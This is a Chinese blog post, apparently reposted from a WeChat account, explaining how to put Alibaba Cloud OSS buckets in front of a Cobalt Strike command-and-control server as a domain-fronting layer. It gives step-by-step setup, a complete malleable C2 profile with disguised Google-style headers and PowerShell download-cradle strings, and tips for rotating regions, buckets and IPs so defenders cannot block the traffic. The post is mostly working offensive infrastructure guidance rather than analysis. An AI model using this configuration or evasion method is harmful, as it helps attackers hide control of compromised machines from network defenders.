和以往的cdn/云函数做域前置相似,利用oss做前置的只是拓展玩法。
利用到的功能特性:OSS是支持回源到自定义地址的,套在c2前面就可以完成域前置操作。
1.注册bucket并通过镜像回源功能将流量指向c2服务
2.开启bucket公共读权限(方便c2profile中写请求随机文件的情况)
3.创建aksk每秒删除一次bucket中的文件(避免回源一次oss将文件缓存到bucket中导致不再回源至c2)
4.修改c2profile中http-post中相关配置,改为通过GET发请求,参考如下 (因为oss不支持POST方法,也没法回源到c2 server)
set sleeptime "60000";set jitter "0";set sample_name "Cobalt Strike Beacon (Default)";stage {set stomppe "false";set name "beacon.dll";string "%d.%s";string "post";string "%s%s";string "cdn.%x%x.%s";string "www6.%x%x.%s";string "%s.1%x.%x%x.%s";string "%s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s";string "%s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s";string "%s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s";string "%s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s";string "%s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s";string "%s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s";string "%s.1%08x%08x%08x%08x%08x%08x.%x%x.%s";string "%s.1%08x%08x%08x%08x%08x.%x%x.%s";string "%s.1%08x%08x%08x%08x.%x%x.%s";string "%s.1%08x%08x%08x.%x%x.%s";string "%s.1%08x%08x.%x%x.%s";string "%s.1%08x.%x%x.%s";string "api.%x%x.%s";string "unknown";string "could not run command (w/ token) because of its length of %d bytes!";string "could not spawn %s (token): %d";string "could not spawn %s: %d";string "Could not open process token: %d (%u)";string "could not run %s as %s\%s: %d";string "COMSPEC";string " /C ";string "could not upload file: %d";string "could not open %s: %d";string "could not get file time: %d";string "could not set file time: %d";string "127.0.0.1";string "Could not connect to pipe (%s): %d";string "Could not open service control manager on %s: %d";string "Could not create service %s on %s: %d";string "Could not start service %s on %s: %d";string "Start servicesservices %s on %s";string "Could not query service %s on %s: %d";string "Could not delete service %s on %s: %d";string "SeDebugPrivilege";string "SeTcbPrivilege";string "SeCreateTokenPrivilege";string "SeAssignPrimaryTokenPrivilege";string "SeLockMemoryPrivilege";string "SeIncreaseQuotaPrivilege";string "SeUnsolicitedInputPrivilege";string "SeMachineAccountPrivilege";string "SeSecurityPrivilege";string "SeTakeOwnershipPrivilege";string "SeLoadDriverPrivilege";string "SeSystemProfilePrivilege";string "SeSystemtimePrivilege";string "SeProfileSingleProcessPrivilege";string "SeIncreaseBasePriorityPrivilege";string "SeCreatePagefilePrivilege";string "SeCreatePermanentPrivilege";string "SeBackupPrivilege";string "SeRestorePrivilege";string "SeShutdownPrivilege";string "SeAuditPrivilege";string "SeSystemEnvironmentPrivilege";string "SeChangeNotifyPrivilege";string "SeRemoteShutdownPrivilege";string "SeUndockPrivilege";string "SeSyncAgentPrivilege";string "SeEnableDelegationPrivilege";string "SeManageVolumePrivilege";string "Could not create service: %d";string "Could not start service: %d";string "Failed to impersonate token: %d";string "Failed to get token";string "IsWow64Process";string "kernel32";string "Could not open '%s'";string "%s\%s";string "copy failed: %d";string "move failed: %d";string "D 0 %02d-%02d-%02d %02d.%02d.%02d %s";string "F %I64d %02d-%02d-%02d %02d.%02d.%02d %s";string "Wow64DisableWow64FsRedirection";string "Wow64RevertWow64FsRedirection";string "ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset.";string "could not allocate %d bytes in process: %d";string "could not write to process memory: %d";string "could not adjust permissions in process: %d";string "could not create remote thread in %d: %d";string "could not open process %d: %d";string "%d is an x64 process (can't inject x86 content)";string "%d is an x86 process (can't inject x64 content)";string "syswow64";string "system32";string "Could not set PPID to %d: %d";string "Could not set PPID to %d";string "ntdll";string "NtQueueApcThread";string "%ld ";string "%.2X";string "%.2X:";string "process";string "Could not connect to pipe: %d";string "%d %d %s";string "Kerberos";string "kerberos ticket purge failed: %08x";string "kerberos ticket use failed: %08x";string "could not connect to pipe: %d";string "could not connect to pipe";string "Maximum links reached. Disconnect one";string "%d %d %d.%d %s %s %s %d %d";string "Could not bind to %d";string "IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/')";string "%%IMPORT%%";string "Command length (%d) too long";string "IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s";string "powershell -nop -exec bypass -EncodedCommand "%s"";string "?%s=%s";string "%s and %s = %s";string "%s%s: %s";string "%s&%s";string "%s%s";string "Could not kill %d: %d";string "%s %d %d";string "%s %d %d %s %s %d";string "%s\*";string "sha256";string "abcdefghijklmnop";string "sprng";string "could not create pipe: %d";string "I'm already in SMB mode";string "%s {admin}";string "Could not open process: %d (%u)";string "Failed to impersonate token from %d (%u)";string "Failed to duplicate primary token for %d (%u)";string "Failed to impersonate logged on user %d (%u)";string "Could not create token: %d";string "HTTP/1.1 200 OK";string "Content-Type: application/octet-stream";string "Content-Length: %d";string "Microsoft Base Cryptographic Provider v1.0";}http-get {set uri "/wiki/doc";client {metadata {base64url;prepend "SESSIONID=";header "Cookie";}}server {header "Server" "nginx/1.10.3 (Ubuntu)";header "Content-Type" "application/octet-stream";header "Connection" "keep-alive";header "Vary" "Accept";header "Pragma" "public";header "Cache-Control" "no-cache";header "Expires" "0";header "Cache-Control" "must-revalidate, post-check=0, pre-check=0";output {mask;netbios;prepend "data=";append "%%";print;}}}http-post {set uri "/wiki/IMXo";set verb "GET";client {header "Sec-Ch-Ua" "" Not;A Brand";v="99", "Google Chrome";v="97", "Chromium";v="97"";header "Sec-Ch-Ua-Mobile" "?0";header "Sec-Ch-Ua-Platfrom" "Windows";header "Accept" "*/*";header "Origin" "Google";header "Sec-Fetch-Site" "same-origin";header "Sec-Fetch-Mode" "no-cors";header "Sec-Fetch-Dest" "empty";header "Referer" "https://www.google.com";header "Accept-Language" "en-US,en;q=0.9";output {base64url;header "X-Client-Data";}id {base64url;parameter "ei";}}server {header "Content-Type" "text/html; charset=UTF-8";header "Bfcache-Opt-In" "unload";header "Server" "gws";header "X-Xss-Protection" "0";header "X-Frame-Origins" "SAMEORIGIN";header "Alt-Svc" "h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"";output {netbios;prepend "n";prepend "{";append "n";append "}";print;}}}post-ex {set spawnto_x86 "c:\windows\syswow64\rundll32.exe";set spawnto_x64 "c:\windows\system32\rundll32.exe";set thread_hint "ntdll.dll!RtlUserThreadStart+0x1000";set pipename "DserNamePipe##, PGMessagePipe##, MsFteWds##";set keylogger "SetWindowsHookEx";}dns-beacon {set maxdns "255";set beacon "";set get_A "cdn.";set get_AAAA "www6.";set get_TXT "api.";set put_metadata "www.";set put_output "post.";}
5.配置listener指向bucket
1.和cdn的域前置玩法一样,可以采集各地区oss的指向的ip list,host绑定,随机轮询IP访问,能够规避单个ip被封的情况。
2.注册n个地区的oss bucket,每个地区又注册n个bucket,避免bucket域名被封,不同地区域名天然轮询到的IP就不同,可进一步避免被封。
不用租户之间的bucket指向的ip池上一样的,不会真的有甲方把会把全球oss的ip全封了吧🐶
原文始发于微信公众号(Medi0cr1ty):对抗小技巧:利用阿里云OSS做域前置
